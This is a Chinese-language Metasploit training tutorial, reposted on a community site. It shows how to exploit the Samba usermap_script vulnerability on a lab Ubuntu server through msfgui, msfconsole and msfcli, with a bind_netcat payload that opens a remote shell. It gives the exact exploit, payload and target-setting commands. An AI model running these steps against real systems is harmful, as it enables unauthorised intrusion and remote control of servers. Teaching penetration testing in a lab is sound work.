Metasploit训练基础-使用MSF基础
  TEZNKK3IfmPf 2023年11月15日 24 0


打开终端,输入


msfgui


Metasploit训练基础-使用MSF基础


metasploit的图形化界面


Metasploit训练基础-使用MSF基础


由于BT5中可以在终端打开图形化界面,但是在最新版本中已经移除msfgui的命令了。


Metasploit训练基础-使用MSF基础


选择no


我们打开ubuntu的服务器


Metasploit训练基础-使用MSF基础


查看获取的IP地址


Metasploit训练基础-使用MSF基础


我们选择exploit模块,multi选项,选择samba,选择usermap_script


Metasploit训练基础-使用MSF基础


链接成功的画面


Metasploit训练基础-使用MSF基础


我们选择cmd里面的unix ,里面的bind—netcat


Metasploit训练基础-使用MSF基础


设置目标的IP地址


选择run exploit


Metasploit训练基础-使用MSF基础


我们看到shell选项,数量变为1


hosts的状态变为alive


Metasploit训练基础-使用MSF基础


通过shell命令,可以知道已经链接上ubuntu服务器了


通过MSF终端进行操作


输入


msfconsole


Metasploit训练基础-使用MSF基础


通过help查看帮助


Metasploit训练基础-使用MSF基础


查找samba服务的漏洞


search samba


Metasploit训练基础-使用MSF基础


发现服务漏洞脚本


use exploit/multi/samba/usermap_script


输入show options来查看选择


show options


Metasploit训练基础-使用MSF基础


set RHOST 192.168.10.254


设置目标IP地址


Metasploit训练基础-使用MSF基础



输入show payloads 选择攻击载荷


show payloads


Metasploit训练基础-使用MSF基础


选择cmd 、unix、bind-netcat


set payload cmd/unix/bind_netcat


Metasploit训练基础-使用MSF基础


输入exploit,开始启动


exploit


Metasploit训练基础-使用MSF基础


Metasploit训练基础-使用MSF基础


已经成功反弹一个shell


使用msfcli进行控制


msf使用一个调用接口


以samba漏洞服务为例


输入


msfcli multi/samba/usermap_script PLAYLOAD=cmd/unix/bind_netcat RHOST=192.168.10.254 E


Metasploit训练基础-使用MSF基础


msfcli(使用接口)

multi/samba/usermap_script(渗透攻击模块)

PLAYLOAD=cmd/unix/bind_netcat(攻击载荷模块)

RHOST=192.168.10.254(目标地址)

E(执行,exploit)


效果是一样的。

【版权声明】本文内容来自摩杜云社区用户原创、第三方投稿、转载,内容版权归原作者所有。本网站的目的在于传递更多信息,不拥有版权,亦不承担相应法律责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@moduyun.com

  1. 分享:
最后一次编辑于 2023年11月15日 0

暂无评论

推荐阅读
TEZNKK3IfmPf